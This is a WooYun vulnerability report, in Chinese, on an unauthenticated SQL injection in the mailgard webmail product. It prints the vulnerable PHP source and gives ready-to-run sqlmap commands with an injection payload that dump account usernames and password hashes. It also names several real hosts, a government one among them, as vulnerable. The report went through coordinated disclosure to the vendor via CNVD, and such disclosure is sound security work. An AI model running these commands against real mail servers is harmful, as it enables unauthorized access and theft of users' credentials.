当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098828

漏洞标题:佑友mailgard webmail无需登录的SQL注射一枚

相关厂商:深圳市河辰通讯技术有限公司

漏洞作者: f4ckbaidu

提交时间:2015-03-31 09:13

修复时间:2015-07-02 16:18

公开时间:2015-07-02 16:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

程序猿别怪我哦

详细说明:

WooYun: 佑友mailgard webmail命令执行之二 里提到,系统自带全局GPC过滤,会自动addslashes
WooYun: 佑友mailgard webmail任意文件上传导致getshell(无需登录) 里提到,有几个越权访问的文件:

./overflow_alarm.php
./sms_send.php
./src/old.rule.php
./src/public_folders_upload.php
./src/big_attach.php
./src/big_att_upload.php
./src/read_data.php
./src/upload.php
./sync/linkman.php


./sync/linkman.php里面有明显的SQL注射($group_id),代码如下
由于没有包含global.php所以全局过滤无效并且不需要登录即可访问,如果未开启magic_quotes_gpc则可注入(系统默认关闭magic_quotes_gpc)

<?php
require_once 'conn.php';
function outputUsers($export_range='', $group_id=0, $part=0){
global $name,$msg;
if($export_range == 'public'){
$query = " AND `group_remark`='public|'";
$query2 = " AND `adscription`='public'";
}else{
$query = " AND `group_remark`='private|".$name."'";
$query2 = " AND `adscription`='".$name."'";
}
$sql = "SELECT * FROM `groups` WHERE `fid`='".$group_id."' ".$query;
$res = mysql_query($sql);
while($rs = mysql_fetch_array($res)){

echo "<group_$part><groupId>".$rs['group_id']."</groupId><groupName>".$rs['group_name']."</groupName>";
$sqlg = "SELECT * FROM `groups` WHERE `fid`='".$rs['group_id']."' ".$query;
$resg = mysql_query($sqlg);
if($rsg = mysql_fetch_array($resg)){
outputUsers($export_range,$rs['group_id'],$part+1);
}
// 列出此组下联系人
$sqll = "SELECT * FROM `linkman` WHERE `group_id`='".$rs['group_id']."' $query2 ORDER BY convert(`name` using GBK) ";
$resl = mysql_query($sqll);
while ($rsl=mysql_fetch_array ($resl)) {
echo "<linkman>
<email>".$rsl['mail_addr']."</email>
<name>".$rsl['name']."</name>
</linkman>";
}
echo "</group_$part>";
}
}
$group_id = $_POST['group_id'] ? $_POST['group_id'] : $_GET['group_id'];
$export_range = $_POST['export_range'] ? $_POST['export_range'] : $_GET['export_range'];
echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
echo '<hechen>';
echo '<public>';
outputUsers('public');
echo '</public>';
echo '<private>';
outputUsers();
echo '</private>';
echo '</hechen>';
?>


看下它包含的conn.php代码,注入一样很明显($name和$token)
由于没有包含global.php所以全局过滤无效并且不需要登录即可访问,如果未开启magic_quotes_gpc则可注入(系统默认关闭magic_quotes_gpc)

<?php
header('Content-type: text/xml');
error_reporting(0);
ini_set("display_errors", "0");
$dbserver = 'localhost';
$dbuser = 'syssql';
$dbuserpw = 'h*****8';
$msg = '';
$link = mysql_connect($dbserver,$dbuser,$dbuserpw) or setError('Cannot connect to the DB');
mysql_select_db('hicommail',$link) or setError('Cannot select the DB');
mysql_query("set names utf8");
$name = $_POST['name'] ? $_POST['name'] : $_GET['name'];
$token = $_POST['token'] ? $_POST['token'] : $_GET['token'];
if(!$name || !$token){
setError("Token can't be empty");
}else{
$sql = "SELECT * FROM `mailbox` WHERE `username` = '".$name."'";
$result = mysql_query($sql,$link);
$row = mysql_fetch_assoc($result);
if(!$row['password']){
setError('Token does not exist');
}elseif($row['active']=="0"){
setError('This account has been frozen');
}else{
$sql = "SELECT * FROM `define_para` WHERE `user_name`='$name' ";
$result = mysql_query($sql);
if($rs = mysql_fetch_array($result)) {
if(time()-$rs['trydate']<120 && $rs['trytimes']>=3) {
mysql_query("UPDATE `define_para` SET `trydate`=".time()." WHERE `user_name`='$name' ");
setError('Try too frequently, please try again after two minutes');
}else{
if($row['password'] != crypt($token,$row["password"])){
$sql = "SELECT * FROM `define_para` WHERE `user_name`='$name' ";
$result = mysql_query($sql);
if($rs = mysql_fetch_array($result)) {
if(time()-$rs['trydate']<120) {
$rs['trytimes']++;
mysql_query("UPDATE `define_para` SET `trytimes`=`trytimes`+1 WHERE `user_name`='$name' ");
}else{
$rs['trytimes'] = 1;
mysql_query("UPDATE `define_para` SET `trydate`='".time()."',`trytimes`=1 WHERE `user_name`='$name' ");
}
}
if( (3-$rs['trytimes'])>0 ){
setError(sprintf('Login fails, you can try %d times', (3-$rs['trytimes'])));
}else{
setError('Try too frequently, please try again after two minutes');
}
}
}
}
}
}
function setError($msg){
echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
echo "<error>$msg</error>";
exit;
}
?>


系统的逻辑是先运行conn.php的代码校验身份,再运行linkman.php的代码
所以我们要搞注入,得从conn.php入手
上sqlmap:

sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token=1" --dbms=mysql --technique=B --dbs --threads=5


邮箱帐号密码在hicommail.mailbox里,sqlmap可直接dump:

sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token=1" --dbms=mysql --technique=B --threads=5 -D hicommail -T mailbox -C username,password --dump


1.png


密码加密类型为php crypt($password,$md5salt),例如$1$08ab2d3c$G1Q/PyedrHxQdfGXOmga0/,这种类型爆破需要时间
不过另外有个表(hicommail.popmanage)保存了少量POP3明文密码,base64编码的,在这里为了保护用户就不贴出来了

漏洞证明:

百度搜索intitle:"mailgard webmail",测试了一下基本上都中招
案例1:http://mail.iconergy.com:889/

1.png


案例2:http://mail.csgholding.com:889/(南玻)

2.png


案例3:http://www.gtc.com.cn:889/

3.png


来个gov的,案例4:http://email.szns.gov.cn:889/

4.png


案例5:http://mail.gcredit.cn:889/

5.png

修复方案:

版权声明:转载请注明来源 f4ckbaidu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-04-03 16:17

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-02 21:40 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    洞主很耐心啊